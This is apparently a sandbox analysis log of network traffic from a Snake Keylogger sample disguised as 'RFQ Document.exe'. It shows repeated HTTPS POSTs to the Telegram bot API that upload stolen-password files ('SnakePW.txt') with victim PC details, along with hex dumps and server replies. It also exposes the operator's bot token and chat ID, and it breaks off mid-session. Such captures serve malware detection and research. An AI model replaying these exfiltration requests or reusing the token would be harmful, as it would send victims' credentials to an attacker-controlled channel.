                                            Data Ascii: --------------------------8d98255c7d58614Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:30 UTC71INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:30 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:30 UTC71INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12625,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            45192.168.2.449821149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:30 UTC71OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c7f484a9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:30 UTC72OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 66 34 38 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c7f484a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:31 UTC72INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:31 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:31 UTC72INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12626,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808711,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            46192.168.2.449822149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:31 UTC73OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c81aabf8
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:31 UTC73OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 31 61 61 62 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c81aabf8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:31 UTC74INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:31 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:31 UTC74INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12627,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808711,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            47192.168.2.449823149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:31 UTC75OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c88d1ae7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:31 UTC75OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 38 64 31 61 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c88d1ae7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:32 UTC75INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:32 UTC76INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12628,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            48192.168.2.449824149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:32 UTC76OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c8b34098
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:32 UTC77OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 62 33 34 30 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c8b34098Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:32 UTC77INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:32 UTC77INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12629,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            49192.168.2.449825149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:32 UTC78OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c8e08d43
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:32 UTC78OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 65 30 38 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c8e08d43Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:32 UTC79INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:32 UTC79INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12630,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.449779149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:21 UTC7OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c27117cd
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:21 UTC8OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 37 31 31 37 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c27117cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:21 UTC8INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:21 UTC8INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12584,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            50192.168.2.449826149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:32 UTC79OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c925b1c0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:33 UTC80OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 32 35 62 31 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c925b1c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:33 UTC80INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
